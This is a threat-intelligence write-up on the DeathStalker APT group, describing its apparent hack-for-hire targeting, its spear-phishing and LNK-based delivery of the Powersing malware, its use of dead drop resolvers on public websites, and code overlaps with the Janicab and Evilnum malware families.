DeathStalker APT

DeathStalker APT Description

DeathStalker is the name given to an Advanced Persistent Threat (APT) group of hackers that the researchers believe to be operating as mercenaries or offering hack-for-hire services. The basis for this analysis is the particular characteristics displayed in operations attributed to the group. Unlike what is considered the typical cybercriminal behavior, DeathStalker does not infect their victims with ransomware and does not collect banking or credit/debit card credentials, clear signs that the hackers are not seeking financial gain from their victims. Instead, DeathStalker appears to have specialized in the exfiltration of data from a very narrow array of victims. Apart from some singular exceptions, such as attacking a diplomatic entity, the group has gone after private companies operating in the financial sector, such as consultancy firms, technology companies, law firms, etc. consistently. As for the geographic spread, by tracking the traffic generated by one of DeathStalker's main tools - a malware threat called Powersing, victims of DeathStalker were discovered in China, Cyprus, Israel, Argentina, Lebanon, Switzerland, Turkey, Taiwan, the United Kingdom and the United Arab Emirates.

Spear-Phishing and Dead Drop Resolvers

Taking a close look at the attack chain of DeathStalker APT reveals that the hackers deliver their main tool through spear-phishing emails carrying compromised attachments. The attached files are masquerade as Explorer documents or archives but, instead, carry a corrupted LNK file. When the unsuspecting user executes them, it initiates a convoluted multi-stage chain. During the initial stage, a decoy document is displayed to the user in an attempt to mask all of the activity that is going on in the background and raise as little suspicion as possible. A persistence mechanism is established by creating a shortcut in the Windows Startup folder that executes a VBE startup script. The actual malware payload is dropped in the second stage of the attack. It connects to a dead drop resolver to obtain the real Command-and-Control (C&C, C2) server address. Once communication is established, Powersing is responsible for only two things - take screenshots of the system, send them to the C2 server immediately and wait for any Powershell scripts provided by the C2 for execution.

The peculiar way in which Powersing arrives at its C2 address is quite unique. The hackers leave strings containing the initial data on various public services as posts, comments, reviews, user profiles, etc. The researchers discovered such messages on Google+, Reddit, ShockChan, Tumblr, Twitter, YouTube, WordPress and Imgur. The use of such well-known public services almost guarantees the success of the initial communication due to the ease with which the traffic blends in with the normally generated traffic and the difficulty that companies may encounter if they decide to blacklist the platforms. There is a drawback for the hackers, though, as removing their traces becomes nearly impossible. As a result, researchers were able to determine that the first signs of Powersing activity originated back in 2017.

Connections between Powersing and Other Malware Families

Powersing possesses some peculiar characteristics that are not that common. So when another malware family is found to have almost identical attributes, it creates a plausible hypothesis that either they are developed by the same hacker group or the threat actors are working closely together, certainly. However, when it comes to Powersing, similarities have been found between it and two other malware families called Janicab and Evilnum.

Let's start with the fact that all three are delivered through LNK files hidden in attachments propagated by spear-phishing emails. Admittedly, this is a pretty common tactic, but all three also obtain their C2 addresses through dead drop resolvers with regular expressions and hardcoded sentences. Finally, there are code overlaps between these malware threats, such as identical names for some variables and functions despite being written in different coding languages.